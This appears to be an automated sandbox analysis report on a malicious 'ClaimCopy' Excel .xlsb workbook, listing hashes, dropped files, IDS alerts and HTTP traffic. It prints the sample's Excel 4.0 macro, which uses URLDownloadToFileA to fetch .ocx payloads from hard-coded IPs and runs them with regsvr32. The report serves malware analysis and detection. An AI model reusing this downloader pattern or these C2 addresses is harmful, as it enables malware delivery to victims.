                                                                                                                                                      FITC-ASUSClaimCopy-46148734-12012021.xlsbGet hashmaliciousBrowse
                                                                                                                                                      • 146.19.170.39
                                                                                                                                                      ClaimCopy-1485093510-12012021.xlsbGet hashmaliciousBrowse
                                                                                                                                                      • 146.19.170.39
                                                                                                                                                      ClaimCopy-1485093510-12012021.xlsbGet hashmaliciousBrowse
                                                                                                                                                      • 146.19.170.39
                                                                                                                                                      ClaimCopy-1603117211-12012021.xlsbGet hashmaliciousBrowse
                                                                                                                                                      • 146.19.170.39
                                                                                                                                                      ClaimCopy-1603117211-12012021.xlsbGet hashmaliciousBrowse
                                                                                                                                                      • 146.19.170.39
                                                                                                                                                      Ljm7n1QDZeGet hashmaliciousBrowse
                                                                                                                                                      • 170.86.31.136
                                                                                                                                                      arm-20211124-0649Get hashmaliciousBrowse
                                                                                                                                                      • 161.135.107.178
                                                                                                                                                      sora.x86Get hashmaliciousBrowse
                                                                                                                                                      • 155.161.132.181
                                                                                                                                                      kQONXU7aieGet hashmaliciousBrowse
                                                                                                                                                      • 170.86.182.169
                                                                                                                                                      6L1AGNUMgkGet hashmaliciousBrowse
                                                                                                                                                      • 170.170.111.2
                                                                                                                                                      Ti6gpYKquBGet hashmaliciousBrowse
                                                                                                                                                      • 161.135.250.102
                                                                                                                                                      91ZRvk3C5dGet hashmaliciousBrowse
                                                                                                                                                      • 170.86.78.185
                                                                                                                                                      4eF0vu40EMGet hashmaliciousBrowse
                                                                                                                                                      • 146.19.118.43
                                                                                                                                                      sora.arm7Get hashmaliciousBrowse
                                                                                                                                                      • 199.81.85.172
                                                                                                                                                      QISwaj96QZGet hashmaliciousBrowse
                                                                                                                                                      • 198.140.20.204
                                                                                                                                                      bKHI9UT0D1Get hashmaliciousBrowse
                                                                                                                                                      • 146.18.97.183
                                                                                                                                                      R9kV5GcwPzGet hashmaliciousBrowse
                                                                                                                                                      • 170.86.31.144
                                                                                                                                                      bqrHRKVNodGet hashmaliciousBrowse
                                                                                                                                                      • 170.86.31.149
                                                                                                                                                      sora.x86Get hashmaliciousBrowse
                                                                                                                                                      • 170.5.226.185
                                                                                                                                                      yqYt9HH2OYGet hashmaliciousBrowse
                                                                                                                                                      • 192.189.190.143

                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                      No context

                                                                                                                                                      Dropped Files

                                                                                                                                                      No context

                                                                                                                                                      Created / dropped Files

                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\3B184E9E-87D6-40D5-A02C-4CE115A663F4
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):140163
                                                                                                                                                      Entropy (8bit):5.358177572181024
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:rcQIfgxrBdA3gBwtnQ9DQW+zCb4Ff7nXbovidXiE6LWmE9:huQ9DQW+zJXfH
                                                                                                                                                      MD5:FE3049A6FC8C8A797E00ECE99583F5E3
                                                                                                                                                      SHA1:ED784AC2AC5A8023B7EECF940400B516694FDF8A
                                                                                                                                                      SHA-256:940BBCB1DD06CD34C33ED6038EA34A8FA6DC07DD22ED6A6E12329DB9EADC29D1
                                                                                                                                                      SHA-512:03A155CEAC9685F814FE7AA93CA0CDF3BE913ED22C8CEBDEB00B27A7BC0A031DFA3FD47D8B27999D553D8DC658148DE4CBCA28ADEE78D35C99A347995DBF3A82
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-12-02T07:31:58">.. Build: 16.0.14715.30527-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\8D550214.jpg
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1098x988, frames 3
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):85681
                                                                                                                                                      Entropy (8bit):7.915850776614707
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:wB5SOqcuTUdehXyvl0f4CZpUcab2GFVbgPuDF7exsylBviKsUw:Pc6EehCfCZpUHKGXbBKsiit
                                                                                                                                                      MD5:4F100E2CEFED046B44EC799015B454EF
                                                                                                                                                      SHA1:5149E5D1B5212C77B3548914E9B47D67B4BEA574
                                                                                                                                                      SHA-256:D30B441AB0E88A1487F29A80D63E2A4865A3F5DF7854FB8359B354397F807E2C
                                                                                                                                                      SHA-512:153581151434815CC17E88D587FF6A6AF8F7154B4A05146453A9814F662C68D79F1063BDD9F789A1DB2F5818D199EF600703F8BC35785B0705332EC231F35A14
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                                      Preview: ......JFIF...........................................'......'#*" "*#>1++1>H<9<HWNNWmhm................................'......'#*" "*#>1++1>H<9<HWNNWmhm...........J..".................................................".............................................................q.[..+...*...K.... ..............?.......g....6..)....=~....................w5...........7_.-.......k.../...;.........!.z%o..w!....,.............?...Gs?.].......C..P~i.._.=..`....{...w....."..-........:..d.....................;z7)...~g........C....v..\..O.....0...v........v... ............A...;.~Y.}.....MsC.~..5..?.;.........V7....G...b..~...........@................O.}...o4.s_...z78.1.yl...X~.u..~..S....J..V~S..x.u~.. ..............@....u..m....rGrf.P.._+Z..?AW..~..u.G....................o&..................................................................9.0...H.Zx...M.y.[kW..o......;.....z......}v.m..[R.i....R..m....+.J............r6.P....|s..].vO._.}..K.]-V.U=9}........W......3.....G.t}Y
                                                                                                                                                      C:\Users\user\Desktop\26440000
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:Microsoft Excel 2007+
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):98360
                                                                                                                                                      Entropy (8bit):7.829546775134455
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:baB5SOqcuTUdehXyvl0f4CZpUcab2GFVbgPuDF7exsylBviKsUI0zf:hc6EehCfCZpUHKGXbBKsiiY
                                                                                                                                                      MD5:89EC7ACFF86630AA367BF975313E71E0
                                                                                                                                                      SHA1:F41D083A6EC24DF7A9D74DCD595874B8B2B36130
                                                                                                                                                      SHA-256:0FF3A241283B1E99DDD73A15BDC93D5FD4AC2BD2620F5DF91297C93490978AF1
                                                                                                                                                      SHA-512:3FDFE13C7FE629DFF6B34244839536E856E24B27E94E9D6D2A5FF640FA3BCF36528170A60738DA15D5DDA2EE4C7AD231CA0B80D628345222AF9FD69898DEC270
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: PK..........!.......R.......[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................U.n.0....?..."..(..r.y.9......q-1.H....wI;n+X...".53...rq.w.x........`k..m*........*i................X.6F.M..[.$r...........e.,..g...Q;...2&..\\.J..X\..z..GmYq../IULzot-#-T.Z.;,...pl."'..k..:.++.../.X.^.......E.u.........l.(./...qO...t..{..$...[A+(.d..eG..l<G.B.h..<.2`..1....)....*.'....n.H..~N.r6%..^v.3I......=Ejw..:..=u..j.kP.~.h..L..O#E.qm.... ....2....&.4...T.........<9...!.,?x>.[.o...R......B.}..G:..L...
                                                                                                                                                      C:\Users\user\Desktop\26440000:Zone.Identifier
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                      Category:modified
                                                                                                                                                      Size (bytes):26
                                                                                                                                                      Entropy (8bit):3.95006375643621
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:ggPYV:rPYV
                                                                                                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: [ZoneTransfer]....ZoneId=0
                                                                                                                                                      C:\Users\user\Desktop\ClaimCopy-46148734-12012021.xlsb (copy)
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:Microsoft Excel 2007+
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):98360
                                                                                                                                                      Entropy (8bit):7.829546775134455
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:baB5SOqcuTUdehXyvl0f4CZpUcab2GFVbgPuDF7exsylBviKsUI0zf:hc6EehCfCZpUHKGXbBKsiiY
                                                                                                                                                      MD5:89EC7ACFF86630AA367BF975313E71E0
                                                                                                                                                      SHA1:F41D083A6EC24DF7A9D74DCD595874B8B2B36130
                                                                                                                                                      SHA-256:0FF3A241283B1E99DDD73A15BDC93D5FD4AC2BD2620F5DF91297C93490978AF1
                                                                                                                                                      SHA-512:3FDFE13C7FE629DFF6B34244839536E856E24B27E94E9D6D2A5FF640FA3BCF36528170A60738DA15D5DDA2EE4C7AD231CA0B80D628345222AF9FD69898DEC270
                                                                                                                                                      Malicious:true
                                                                                                                                                      Preview: PK..........!.......R.......[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................U.n.0....?..."..(..r.y.9......q-1.H....wI;n+X...".53...rq.w.x........`k..m*........*i................X.6F.M..[.$r...........e.,..g...Q;...2&..\\.J..X\..z..GmYq../IULzot-#-T.Z.;,...pl."'..k..:.++.../.X.^.......E.u.........l.(./...qO...t..{..$...[A+(.d..eG..l<G.B.h..<.2`..1....)....*.'....n.H..~N.r6%..^v.3I......=Ejw..:..=u..j.kP.~.h..L..O#E.qm.... ....2....&.4...T.........<9...!.,?x>.[.o...R......B.}..G:..L...
                                                                                                                                                      C:\Users\user\Desktop\~$ClaimCopy-46148734-12012021.xlsb
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):165
                                                                                                                                                      Entropy (8bit):1.6081032063576088
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                                                      MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                                                      SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                                                      SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                                                      SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                                                      Malicious:true
                                                                                                                                                      Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                      Static File Info

                                                                                                                                                      General

                                                                                                                                                      File type:Microsoft Excel 2007+
                                                                                                                                                      Entropy (8bit):7.829986417947683
                                                                                                                                                      TrID:
                                                                                                                                                      • Microsoft Excel Office Binary workbook document (40504/1) 83.51%
                                                                                                                                                      • ZIP compressed archive (8000/1) 16.49%
                                                                                                                                                      File name:ClaimCopy-46148734-12012021.xlsb
                                                                                                                                                      File size:98558
                                                                                                                                                      MD5:f1107ae8c76f3ac6c7691fa5a857b206
                                                                                                                                                      SHA1:b69597b25562a96547402d9bcadc096a340b8a69
                                                                                                                                                      SHA256:85278a1649ffd17dae84fce72827f804b0091b907efd841ac95f6b4644fd8d5a
                                                                                                                                                      SHA512:c861360e6f69811f7e4be22885e58e0c233ee409f83ee560e796e4038024d49c5675bde2c2cab45df5dcd94ee83324fac47b5aefd0835327e1a8af17e41f26ef
                                                                                                                                                      SSDEEP:1536:whNB5SOqcuTUdehXyvl0f4CZpUcab2GFVbgPuDF7exsylBviKsU3Tds:O0c6EehCfCZpUHKGXbBKsiiCds
                                                                                                                                                      File Content Preview:PK..........!..]j.....R.......[Content_Types].xml ...(.....................................................................................................................................FF..................................................................

                                                                                                                                                      File Icon

                                                                                                                                                      Icon Hash:74f0d0d2c6d6d0f4

                                                                                                                                                      Static OLE Info

                                                                                                                                                      General

                                                                                                                                                      Document Type:OpenXML
                                                                                                                                                      Number of OLE Files:1

                                                                                                                                                      OLE File "ClaimCopy-46148734-12012021.xlsb"

                                                                                                                                                      Indicators

                                                                                                                                                      Has Summary Info:
                                                                                                                                                      Application Name:
                                                                                                                                                      Encrypted Document:
                                                                                                                                                      Contains Word Document Stream:
                                                                                                                                                      Contains Workbook/Book Stream:
                                                                                                                                                      Contains PowerPoint Document Stream:
                                                                                                                                                      Contains Visio Document Stream:
                                                                                                                                                      Contains ObjectPool Stream:
                                                                                                                                                      Flash Objects Count:
                                                                                                                                                      Contains VBA Macros:

                                                                                                                                                      Macro 4.0 Code

                                                                                                                                                      8,6,=Drozd(0,"http://"&Tiposa!E21&Tiposa!G22&Tiposa!G23,"C:\ProgramData\Volet1.ocx",0,0)
9,6,=Drozd(0,"http://"&Tiposa!E22&Tiposa!G22&Tiposa!G23,"C:\ProgramData\Volet2.ocx",0,0)
10,6,=Drozd(0,"http://"&Tiposa!E23&Tiposa!G22&Tiposa!G23,"C:\ProgramData\Volet3.ocx",0,0)
11,6,=Drozd(0,"http://"&Tiposa!E24&Tiposa!G22&Tiposa!G24,"C:\ProgramData\Volet4.ocx",0,0)
12,6,=Drozd(0,"http://"&Tiposa!E25&Tiposa!G22&Tiposa!G24,"C:\ProgramData\Volet5.ocx",0,0)
13,6,=Drozd(0,"http://"&Tiposa!E26&Tiposa!G22&Tiposa!G24,"C:\ProgramData\Volet6.ocx",0,0)
15,6,=EXEC("regsvr32  C:\ProgramData\Volet1.ocx")
16,6,=EXEC("regsvr32 C:\ProgramData\Volet2.ocx")
17,6,=EXEC("regsvr32 C:\ProgramData\Volet3.ocx")
18,6,=EXEC("regsvr32 -e -n -i:&Tiposa!G22&  C:\ProgramData\Volet4.ocx")
19,6,=EXEC("regsvr32 -e -n -i:&Tiposa!G22&  C:\ProgramData\Volet5.ocx")
20,6,=EXEC("regsvr32 -e -n -i:&Tiposa!G22&  C:\ProgramData\Volet6.ocx")
23,6,=HALT()

                                                                                                                                                      16,3,uRl
17,3,="Mon"
18,3,="URLDownloadTo"
19,3,="JJCCBB"
20,4,185.106.123.73/
21,4,146.19.170.39/
21,6,=RANDBETWEEN(142536473,988879789754)
22,4,94.140.114.63/
22,6,=".dat"
23,4,94.140.114.63/
23,6,=".dat2"
24,4,185.106.123.73/
24,6,=REGISTER(D17&D18,D19&"FileA",D20,"Drozd",,1,9)
25,4,146.19.170.39/
37,6,=GOTO(Tiposa1!G8)

                                                                                                                                                      Network Behavior

                                                                                                                                                      Snort IDS Alerts

                                                                                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                      12/02/21-08:22:02.281420ICMP399ICMP Destination Unreachable Host Unreachable185.106.123.67192.168.2.22
                                                                                                                                                      12/02/21-08:22:02.281462ICMP399ICMP Destination Unreachable Host Unreachable185.106.123.67192.168.2.22
                                                                                                                                                      12/02/21-08:22:08.529732ICMP399ICMP Destination Unreachable Host Unreachable185.106.123.67192.168.2.22
                                                                                                                                                      12/02/21-08:22:21.359317ICMP399ICMP Destination Unreachable Host Unreachable185.106.123.67192.168.2.22
                                                                                                                                                      12/02/21-08:22:26.313483ICMP399ICMP Destination Unreachable Host Unreachable185.106.123.67192.168.2.22
                                                                                                                                                      12/02/21-08:22:30.295440ICMP399ICMP Destination Unreachable Host Unreachable185.106.123.67192.168.2.22
                                                                                                                                                      12/02/21-08:22:41.648286TCP1201ATTACK-RESPONSES 403 Forbidden8049167146.19.170.39192.168.2.22
                                                                                                                                                      12/02/21-08:24:09.205154ICMP399ICMP Destination Unreachable Host Unreachable185.106.123.67192.168.2.22
                                                                                                                                                      12/02/21-08:24:15.511167ICMP399ICMP Destination Unreachable Host Unreachable185.106.123.67192.168.2.22
                                                                                                                                                      12/02/21-08:24:29.247078ICMP399ICMP Destination Unreachable Host Unreachable185.106.123.67192.168.2.22
                                                                                                                                                      12/02/21-08:24:32.918862ICMP399ICMP Destination Unreachable Host Unreachable185.106.123.67192.168.2.22
                                                                                                                                                      12/02/21-08:24:35.960823ICMP399ICMP Destination Unreachable Host Unreachable185.106.123.67192.168.2.22
                                                                                                                                                      12/02/21-08:24:48.200067TCP1201ATTACK-RESPONSES 403 Forbidden8049175146.19.170.39192.168.2.22

                                                                                                                                                      Network Port Distribution

                                                                                                                                                      TCP Packets

                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                      Dec 2, 2021 08:32:01.231698036 CET4971380192.168.2.3185.106.123.73
                                                                                                                                                      Dec 2, 2021 08:32:04.235083103 CET4971380192.168.2.3185.106.123.73
                                                                                                                                                      Dec 2, 2021 08:32:10.250827074 CET4971380192.168.2.3185.106.123.73
                                                                                                                                                      Dec 2, 2021 08:32:22.264904022 CET4971680192.168.2.3146.19.170.39
                                                                                                                                                      Dec 2, 2021 08:32:22.324340105 CET8049716146.19.170.39192.168.2.3
                                                                                                                                                      Dec 2, 2021 08:32:22.324512005 CET4971680192.168.2.3146.19.170.39
                                                                                                                                                      Dec 2, 2021 08:32:22.325050116 CET4971680192.168.2.3146.19.170.39
                                                                                                                                                      Dec 2, 2021 08:32:22.384202957 CET8049716146.19.170.39192.168.2.3
                                                                                                                                                      Dec 2, 2021 08:32:22.568588018 CET8049716146.19.170.39192.168.2.3
                                                                                                                                                      Dec 2, 2021 08:32:22.568716049 CET4971680192.168.2.3146.19.170.39
                                                                                                                                                      Dec 2, 2021 08:32:22.576828003 CET4971780192.168.2.394.140.114.63
                                                                                                                                                      Dec 2, 2021 08:32:25.580019951 CET4971780192.168.2.394.140.114.63
                                                                                                                                                      Dec 2, 2021 08:32:31.580493927 CET4971780192.168.2.394.140.114.63
                                                                                                                                                      Dec 2, 2021 08:32:43.640060902 CET4973580192.168.2.394.140.114.63
                                                                                                                                                      Dec 2, 2021 08:32:46.644332886 CET4973580192.168.2.394.140.114.63
                                                                                                                                                      Dec 2, 2021 08:32:52.661874056 CET4973580192.168.2.394.140.114.63
                                                                                                                                                      Dec 2, 2021 08:33:04.712316036 CET4977480192.168.2.3185.106.123.73
                                                                                                                                                      Dec 2, 2021 08:33:07.724205971 CET4977480192.168.2.3185.106.123.73
                                                                                                                                                      Dec 2, 2021 08:33:13.724643946 CET4977480192.168.2.3185.106.123.73
                                                                                                                                                      Dec 2, 2021 08:33:25.755275965 CET4971680192.168.2.3146.19.170.39
                                                                                                                                                      Dec 2, 2021 08:33:25.757282019 CET4978380192.168.2.3146.19.170.39
                                                                                                                                                      Dec 2, 2021 08:33:25.814733982 CET8049716146.19.170.39192.168.2.3
                                                                                                                                                      Dec 2, 2021 08:33:25.814915895 CET4971680192.168.2.3146.19.170.39
                                                                                                                                                      Dec 2, 2021 08:33:25.816318035 CET8049783146.19.170.39192.168.2.3
                                                                                                                                                      Dec 2, 2021 08:33:25.816504955 CET4978380192.168.2.3146.19.170.39
                                                                                                                                                      Dec 2, 2021 08:33:25.817735910 CET4978380192.168.2.3146.19.170.39
                                                                                                                                                      Dec 2, 2021 08:33:25.876892090 CET8049783146.19.170.39192.168.2.3
                                                                                                                                                      Dec 2, 2021 08:33:26.068267107 CET8049783146.19.170.39192.168.2.3
                                                                                                                                                      Dec 2, 2021 08:33:26.068614006 CET4978380192.168.2.3146.19.170.39
                                                                                                                                                      Dec 2, 2021 08:34:31.071492910 CET8049783146.19.170.39192.168.2.3
                                                                                                                                                      Dec 2, 2021 08:34:31.071710110 CET4978380192.168.2.3146.19.170.39
                                                                                                                                                      Dec 2, 2021 08:35:38.062621117 CET4978380192.168.2.3146.19.170.39
                                                                                                                                                      Dec 2, 2021 08:35:38.374738932 CET4978380192.168.2.3146.19.170.39
                                                                                                                                                      Dec 2, 2021 08:35:38.984178066 CET4978380192.168.2.3146.19.170.39
                                                                                                                                                      Dec 2, 2021 08:35:40.187432051 CET4978380192.168.2.3146.19.170.39

                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                      • 146.19.170.39

                                                                                                                                                      HTTP Packets

                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                      0192.168.2.349716146.19.170.3980C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                      Dec 2, 2021 08:32:22.325050116 CET530OUTGET /710276824738.dat HTTP/1.1
                                                                                                                                                      Accept: */*
                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                      Host: 146.19.170.39
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Dec 2, 2021 08:32:22.568588018 CET531INHTTP/1.1 403 Forbidden
                                                                                                                                                      Server: nginx
                                                                                                                                                      Date: Thu, 02 Dec 2021 07:32:22 GMT
                                                                                                                                                      Content-Type: text/html
                                                                                                                                                      Content-Length: 548
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                      1192.168.2.349783146.19.170.3980C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                      Dec 2, 2021 08:33:25.817735910 CET7385OUTGET /710276824738.dat2 HTTP/1.1
                                                                                                                                                      Accept: */*
                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                      Host: 146.19.170.39
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Dec 2, 2021 08:33:26.068267107 CET7386INHTTP/1.1 403 Forbidden
                                                                                                                                                      Server: nginx
                                                                                                                                                      Date: Thu, 02 Dec 2021 07:33:26 GMT
                                                                                                                                                      Content-Type: text/html
                                                                                                                                                      Content-Length: 548
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
